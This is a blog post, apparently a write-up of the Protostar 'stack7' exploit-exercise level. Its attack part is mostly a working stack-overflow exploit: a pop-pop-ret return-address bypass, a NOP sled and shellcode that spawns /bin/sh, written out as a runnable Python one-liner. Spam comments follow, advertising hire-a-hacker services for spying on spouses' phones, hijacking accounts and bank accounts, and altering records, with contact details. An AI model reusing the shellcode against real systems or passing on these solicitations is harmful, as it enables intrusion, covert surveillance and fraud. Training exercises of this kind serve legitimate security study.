Exploit Exercises - Protostar Stack 7

In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code |
This is shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)
And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) | /opt/protostar/bin/stack7

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Comments

Alex said…
i strongly recommend BESTAPPSHACKERS@GMAIL.COM, last year he helped me spy on my wife when he was cheating of me, he served as a personal investigator to me by helping me spy on my wife's phone activities like facebook, email, whatsapp, calls, skype and others. am sure someone out there is looking for how to solve his relationship problems, contact him BESTAPPSHACKERS@GMAIL.COM or text him on whatsapp +1(602)-609-4730
johnny said…
Do you need to hack into any, databaseserver spy on Facebook,Emails, Whatsapp, Viber, Snapchat, Instagram and many more.
I urge you to get in touch with the best people for the job, i have confirm the service when i need to spy on my spouse phone. They are good at Phone Cloning and Bitcoin/binary minning and any other hack job.
Thanks guys for the team work HACKINTECHNOLOGYATGMAILDOTCOM
+12132951376(WHATSAPP)
ddd said…
Have you ever needed an expert when it comes to hacking? Have you ever wanted to hack someone’s email account? Recover lost accounts,school grade,boost credit score? Do you need to find a person’s sensitive information? Do you want to invade a person’s PayPal, Skrill, Amazon, Facebook or any other site account? Upgrade of University Grades,Password and email Retrieval, phone Lines monitoring, Skype Accounts, Hack Social Network, Trace calls on real time conversations, Remove Criminal Records, Credit Fixing, cyber-crime investigation, Hack Bank Accounts, Identification of Cheating Partner or employee,GET HOT STOCK TIPS Then contact contact Email:- stocktipsandethicalhacking2020@gmail.com Hangout :- stocktipsandethicalhacking2020@gmail.com Telegram Number +14242742967 Business Whatsapp :- ‪ 1 (925) 291-0054‬) Text Message/Call: ‪ +1 424) 274 2967‬‬ or click on this link to chat on whatsapp https://wa.me/message/REE2BBXU4CEYF1

Popular posts from this blog

Python - Multithread to read one file

Install Xposed Inspector and Frida on Genymotion

OpenCA tutorial